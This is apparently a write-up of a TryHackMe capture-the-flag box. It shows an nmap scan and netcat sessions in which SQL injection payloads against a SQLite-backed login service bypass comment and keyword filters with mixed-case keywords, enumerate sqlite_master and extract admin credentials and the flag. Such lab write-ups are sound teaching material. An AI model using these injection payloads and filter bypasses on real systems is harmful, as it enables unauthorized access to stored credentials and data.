Avatar

Lightroom

Scanning

# Nmap 7.94SVN scan initiated Thu Jan 30 15:28:56 2025 as: nmap -sC -sV -oA namp -p- 10.10.97.2
Nmap scan report for 10.10.97.2
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 61:c5:06:f2:4a:20:5b:cd:09:4d:72:b0:a5:aa:ce:71 (RSA)
|   256 51:e0:5f:fa:81:64:d3:d9:26:24:16:ca:45:94:c2:00 (ECDSA)
|_  256 77:e1:36:3b:95:9d:e0:3e:0a:56:82:b2:9d:4c:fe:1a (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     Welcome to the Light database!
|     Please enter your username:
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest: 
|     Welcome to the Light database!
|     Please enter your username: Username not found.
|_    Please enter your username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.94SVN%I=7%D=1/30%Time=679BE12E%P=x86_64-pc-linux-gnu%r
SF:(NULL,3B,"Welcome\x20to\x20the\x20Light\x20database!
Please\x20enter\x
SF:20your\x20username:\x20")%r(GenericLines,6B,"Welcome\x20to\x20the\x20Li
SF:ght\x20database!
Please\x20enter\x20your\x20username:\x20Username\x20n
SF:ot\x20found\.
Please\x20enter\x20your\x20username:\x20")%r(GetRequest,
SF:6B,"Welcome\x20to\x20the\x20Light\x20database!
Please\x20enter\x20your
SF:\x20username:\x20Username\x20not\x20found\.
Please\x20enter\x20your\x2
SF:0username:\x20")%r(HTTPOptions,6B,"Welcome\x20to\x20the\x20Light\x20dat
SF:abase!
Please\x20enter\x20your\x20username:\x20Username\x20not\x20foun
SF:d\.
Please\x20enter\x20your\x20username:\x20")%r(RTSPRequest,6B,"Welco
SF:me\x20to\x20the\x20Light\x20database!
Please\x20enter\x20your\x20usern
SF:ame:\x20Username\x20not\x20found\.
Please\x20enter\x20your\x20username
SF::\x20")%r(RPCCheck,3B,"Welcome\x20to\x20the\x20Light\x20database!
Plea
SF:se\x20enter\x20your\x20username:\x20")%r(DNSVersionBindReqTCP,3B,"Welco
SF:me\x20to\x20the\x20Light\x20database!
Please\x20enter\x20your\x20usern
SF:ame:\x20")%r(DNSStatusRequestTCP,3B,"Welcome\x20to\x20the\x20Light\x20d
SF:atabase!
Please\x20enter\x20your\x20username:\x20")%r(Help,6B,"Welcome
SF:\x20to\x20the\x20Light\x20database!
Please\x20enter\x20your\x20usernam
SF:e:\x20Username\x20not\x20found\.
Please\x20enter\x20your\x20username:\
SF:x20")%r(SSLSessionReq,3B,"Welcome\x20to\x20the\x20Light\x20database!
P
SF:lease\x20enter\x20your\x20username:\x20")%r(TerminalServerCookie,3B,"We
SF:lcome\x20to\x20the\x20Light\x20database!
Please\x20enter\x20your\x20us
SF:ername:\x20")%r(TLSSessionReq,3B,"Welcome\x20to\x20the\x20Light\x20data
SF:base!
Please\x20enter\x20your\x20username:\x20")%r(Kerberos,3B,"Welcom
SF:e\x20to\x20the\x20Light\x20database!
Please\x20enter\x20your\x20userna
SF:me:\x20")%r(SMBProgNeg,3B,"Welcome\x20to\x20the\x20Light\x20database!

SF:Please\x20enter\x20your\x20username:\x20")%r(X11Probe,3B,"Welcome\x20to
SF:\x20the\x20Light\x20database!
Please\x20enter\x20your\x20username:\x20
SF:")%r(FourOhFourRequest,6B,"Welcome\x20to\x20the\x20Light\x20database!

SF:Please\x20enter\x20your\x20username:\x20Username\x20not\x20found\.
Ple
SF:ase\x20enter\x20your\x20username:\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 30 15:32:09 2025 -- 1 IP address (1 host up) scanned in 192.67 seconds

I have two services: port 22 SSH, and 1337 TCP. The next step is to enumerate each of them with lots of patient. My first scan was a standard scan nmap -sC -sV -oN nmap 10.10.97.2 but this can revealed only port 22 ssh, so I did a more comprehensive scan adding the flag -p- to scall all the ports.

Enumeration

The only port that is worth enumeration at this stage is 1337, additionally the challenges gives me some informmation about how to interact with this service.

You can connect to it using nc MACHINE_IP 1337. You can use the username smokey in order to get started.

Once connected the first thing I have is a prompt that says Welcome to Light database, and it feels like a hint... the next prompt tells me to enter a username.

$ nc 10.10.37.110 1337
Welcome to the Light database!
Please enter your username:

As suggested by the challenge description entering the username smokey tells me his password.

$ nc 10.10.37.110 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username:

Now that I know how to interact with the service I need to exploit it and the only attack that came into my mind at the time of doing the box was the SQL Injection (SQLi). Also searching for lightweight database on Google I have a list of lightweight databases and among them, there is one in particular that catches my interest.

As I was not able to verify that it was actually SQLite from this point I proceeded assuming it was SQLite and I will use table and schemas for SQLite hoping it will work. If it doesent I will have to try a different one...

My first attempt was some SQL Injection query from Wikipedia and it's showing the following queries.

' OR '1'='1' --
' OR '1'='1' {
' OR '1'='1' /*

By entering the first query I received an error message "For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)" so my first idea was to try without the "--" which is a comment statement. Now the application is giving me a different error, "Error: unrecognized token: "'1'' LIMIT 30".

Please enter your username: smokey ' or '1' = '1' --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: smokey ' or '1' = '1'
Error: unrecognized token: "'1'' LIMIT 30"
Please enter your username:

LIMIT is a SQL clause that tells the number of rows to output, and the main thing to note here is the number of single quotes in the message! There are 3! an extra one.

At this point, I can try to guess how is the original query being executed behind the scenes. SELECT [columnName] FROM [tableName] WHERE [columnNmae] = '[userinput]' LIMIT 30 where columnName can be something like user, username or just name.

Now the error was caused because my input contained an extra single quote that was added to the final query making it syntactically wrong. Let's assume the column name is username and the table name is users for this example.

That extra quote I inserted as giving me the syntax error. So to meke it syntacttically correct I have to remove it from my malicious query.

Please enter your username: smokey ' or '1' = '1
Password: tF8tj2o94WE4LKC

Now it is working as intended, with no syntax error. But why is it working?

Time to retrieve the admin's password assuming there is an admin user. Let's test and see what the application says, it may give me more information about the application's behaviour.

It is still giving me the same password!

Please enter your username: admin ' or '1' = '1
Password: tF8tj2o94WE4LKC

This is because the user "admin" does not exist in the database so the first part of the query fails and the cond part passes FALSR or TRUE = TRUE but when TRUE is given in a query it returns all the occurrences, being smokey the only entry of the table it returns the same password.

At this point I have to try different type of SQL Injections. By searching for different types of SQL Injection on Google this page came out. From the list thanks to my experience I can tell the most suitable type would be the Union base SQL Injection.

I tried different types of Union-based SQLi, and none of them worked due to the input check.

Please enter your username: ' or 1=1; --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: admin SELECT * FROM all_tables
Ahh there is a word in there I don't like :(
Please enter your username: admin ' or UNION ALL SELECT NULL,version()--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: admin ' UNION ALL SELECT NULL,version()  
Ahh there is a word in there I don't like :(

After a few tries by luck, I understood that there was a filter on SQL keywords that was bypassable by mixing capital letters. So instead of SELECT and UNION or all lowercase select and union, I had to write Select or uNion.

Now I need more inforamation about the database instead of trying to guess the table and column names.

Searching for SQLite sytem table I found out the following tables:

SQLite: System Tables

System TableDescription
sqlite_masterMaster listing of all database objects in the database and the SQL used to create each object.
sqlite_sequence

Lists the last sequence number used for the AUTOINCREMENT column in a table.

The sqlite_sequence table will only be created once an AUTOINCREMENT column has been defined in the database and at least one sequence number value has been generated and used in the database.
sqlite_stat1 This table is created by the ANALYZE command to store statistical information about the tables and indexes analyzed. This information will be later used by the query optimizer.

SQLite Master Table: sqlite_master

Column Name Description
type The type of database object such as table, index, trigger or view.
nameThe name of the database object.
tbl_name The table name that the database object is associated with.
rootpageRoot page.
sqlSQL used to create the database object.

Now I can enumerate the tables in this database and the query used to create the table.

Please enter your username: smokey ' Union Select tbl_name From sqlite_master Where type='table
Password: admintable
Please enter your username: smokey ' Union Select sql From sqlite_master Where type='table
Password: CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)

Now that I know the structure of this table I can craft specific query to extract the information in it.

Exploitation

After a few tries I came up with the following query to print the username to answer the first question.

Please enter your username: smokey ' uNIon Select username fRom admintable WHere username Like '%
Password: TryHackMeAdmin

Q: What is the admin username?
A: TryHackMeAdmin

After confirming the table name and the column name I can craft the query to extract the passowrd

Please enter your username: smokey ' uNIon Select password fRom admintable WHere username='TryHackMeAdmin
Password: mamZtAuMlrsEy5bp6q17

Q: What is the password to the username mentioned in question 1?
A: mamZtAuMlrsEy5bp6q17

To extract the flag after many attempts again doing random queries I wanted to print out everything in the table with the clause LIKE '%' as I was tired of extracting exactly the password. Why focusing extracting the password when I can extract everything in the table?

Please enter your username: smokey ' uNIon Select password fRom admintable WHere password Like '%
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}

Q: What is the flag?
A: THM{SQLit3_InJ3cTion_is_SimplE_nO?}

Index


Tags

boxctfeasysqlsqlitethm